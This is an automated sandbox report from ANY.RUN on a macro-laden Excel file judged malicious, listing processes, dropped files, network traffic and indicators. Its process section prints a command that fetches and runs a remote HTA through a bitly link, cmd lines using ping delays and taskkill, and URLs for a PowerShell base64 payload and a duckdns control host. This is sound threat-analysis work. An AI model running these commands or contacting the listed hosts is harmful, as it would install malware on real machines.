File name: a44bcc5459f5d3b6a115bc50a7403fd85721acaecf0a4ac9b4e025df4d796845.xls

Full analysis: https://app.any.run/tasks/8382ae5e-81eb-40b6-9fe1-3ebd3d997558
Verdict: Malicious activity
Analysis date: April 24, 2019, 01:46:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Mon Apr 22 19:28:18 2019, Security: 0
MD5: DE611846537F549B214973A367659F4E
SHA1: CFB375118D1728E1184F8A02A6266C8637B518F4
SHA256: A44BCC5459F5D3B6A115BC50A7403FD85721ACAECF0A4AC9B4E025DF4D796845
SSDEEP: 768:v2K1Tgbyw3sz2jyngov9rjXjBCKTUAuulFFVgiqW3E:OK1Tgbyw3sz2jyngov9rjXjBCKoAuul8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1480)
      • cmd.exe (PID: 1412)
      • cmd.exe (PID: 3780)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 2208)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2208)
  • SUSPICIOUS

    • Creates files in the user directory

      • mshta.exe (PID: 936)
      • powershell.exe (PID: 868)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 936)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1412)
      • cmd.exe (PID: 1480)
    • Application launched itself

      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1412)
      • cmd.exe (PID: 1480)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 2592)
      • cmd.exe (PID: 2648)
    • Executes PowerShell scripts

      • forfiles.exe (PID: 3464)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 936)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2208)
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: -
LastModifiedBy: -
Software: Microsoft Excel
CreateDate: 2015:06:05 18:19:34
ModifyDate: 2019:04:22 18:28:18
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: Plan1
HeadingPairs:
  • Planilhas
  • 1
CompObjUserTypeLen: 34
CompObjUserType: Planilha do Microsoft Excel 2003
No data.
All screenshots are available in the full report
Total processes: 53
Monitored processes: 17
Malicious processes: 2
Suspicious processes: 3

Behavior graph

Processes shown in the graph, in order: excel.exe, mshta.exe, cmd.exe, ping.exe, cmd.exe, taskkill.exe, cmd.exe, ping.exe, cmd.exe, taskkill.exe, cmd.exe, cmd.exe, ping.exe, ping.exe, cmd.exe, forfiles.exe, powershell.exe

Process information

PID: 2208
CMD: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Excel
Exit code: 1
Version: 14.0.6024.1000

PID: 936
CMD: mshta http://www.bitly.com/MsgUpSentVin
Path: C:\Windows\system32\mshta.exe
Parent process: EXCEL.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 3896
CMD: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 2 > nul & cmd /c taskkill /f /im WINWORD.EXE & exit
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 128
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 1796
CMD: ping 127.0.0.1 -n 2
Path: C:\Windows\system32\PING.EXE
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: TCP/IP Ping Command
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2592
CMD: cmd /c taskkill /f /im WINWORD.EXE
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 128
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3984
CMD: taskkill /f /im WINWORD.EXE
Path: C:\Windows\system32\taskkill.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Terminates Processes
Exit code: 128
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 1412
CMD: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 3 > nul & cmd /c taskkill /f /im EXCEL.EXE & exit
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3128
CMD: ping 127.0.0.1 -n 3
Path: C:\Windows\system32\PING.EXE
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: TCP/IP Ping Command
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2648
CMD: cmd /c taskkill /f /im EXCEL.EXE
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 1668
CMD: taskkill /f /im EXCEL.EXE
Path: C:\Windows\system32\taskkill.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Terminates Processes
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 901
Read events: 802
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 0
Suspicious files: 3
Text files: 2
Unknown types: 0

Dropped files

PID: 2208 (EXCEL.EXE)
Filename: C:\Users\admin\AppData\Local\Temp\CVR5CB2.tmp.cvr
MD5: -
SHA256: -

PID: 2208 (EXCEL.EXE)
Filename: C:\Users\admin\AppData\Local\Temp\~DF44C7611FF97DB07E.TMP
MD5: -
SHA256: -

PID: 868 (powershell.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8WEB9QOMJQJ25DZR3H8Y.temp
MD5: -
SHA256: -

PID: 936 (mshta.exe)
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\comando[1].htm
Type: html
MD5: C88C580470820DF5DFB725E4CF6950A6
SHA256: 7FCABA43D352FF1CC4AF2E097F73EE86844A6CF175E7D9C0813DEFCD1FA1A207

PID: 2208 (EXCEL.EXE)
Filename: C:\Users\admin\AppData\Local\Temp\~DFBFC95DE18448AE21.TMP
Type: binary
MD5: B112A595FD6A76F30355F1A247E3558F
SHA256: 232F01299AF9F2B25A5FB57061FEC3E2391EB5F36E9DFB3775595AA3D7F44D2D

PID: 868 (powershell.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf2ac0.TMP
Type: binary
MD5: 131DC75F6D4142CA9244945A91A71E8D
SHA256: F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4

PID: 936 (mshta.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txt
Type: text
MD5: 36FBCEFA0C62A135A6A9DBEB88767981
SHA256: F9A98D9C45D7C54E64096B2E2E040EE4B7FD030CD42B6572D928C53A85A04624

PID: 868 (powershell.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 131DC75F6D4142CA9244945A91A71E8D
SHA256: F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
HTTP(S) requests: 4
TCP/UDP connections: 5
DNS requests: 3
Threats: 0

HTTP requests

PID: 936 (mshta.exe)
Method: GET
HTTP Code: -
IP: 177.12.161.211:80
URL: http://gabrielfaller.com.br/image/comando.html
CN: BR
Reputation: unknown

PID: 936 (mshta.exe)
Method: GET
HTTP Code: 301
IP: 67.199.248.15:80
URL: http://bitly.com/MsgUpSentVin
CN: US
Type: html
Size: 133 b
Reputation: shared

PID: 868 (powershell.exe)
Method: GET
HTTP Code: 200
IP: 177.12.161.211:80
URL: http://gabrielfaller.com.br/image/base.mp3
CN: BR
Type: text
Size: 544 Kb
Reputation: unknown

PID: 936 (mshta.exe)
Method: GET
HTTP Code: 301
IP: 67.199.248.15:80
URL: http://www.bitly.com/MsgUpSentVin
CN: US
Type: html
Size: 178 b
Reputation: shared

Connections

PID: 936 (mshta.exe)
IP: 177.12.161.211:80
Domain: gabrielfaller.com.br
ASN: IPV6 Internet Ltda
CN: BR
Reputation: unknown

PID: -
IP: 152.245.202.67:7000
Domain: olhomagicocdt.duckdns.org
ASN: TELEFÔNICA BRASIL S.A
CN: BR
Reputation: unknown

PID: 868 (powershell.exe)
IP: 177.12.161.211:80
Domain: gabrielfaller.com.br
ASN: IPV6 Internet Ltda
CN: BR
Reputation: unknown

PID: 936 (mshta.exe)
IP: 67.199.248.15:80
Domain: www.bitly.com
ASN: Bitly Inc
CN: US
Reputation: shared

DNS requests

Domain: www.bitly.com
IP: 67.199.248.15, 67.199.248.14
Reputation: shared

Domain: gabrielfaller.com.br
IP: 177.12.161.211
Reputation: unknown

Domain: olhomagicocdt.duckdns.org
IP: 152.245.202.67
Reputation: malicious

Threats

PID: 936 (mshta.exe)
Class: Misc activity
Message: SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)

PID: 936 (mshta.exe)
Class: Misc activity
Message: SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)

PID: 868 (powershell.exe)
Class: Misc activity
Message: SUSPICIOUS [PTsecurity] Executable base64 Payload

PID: -
Class: Misc activity
Message: ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
No debug info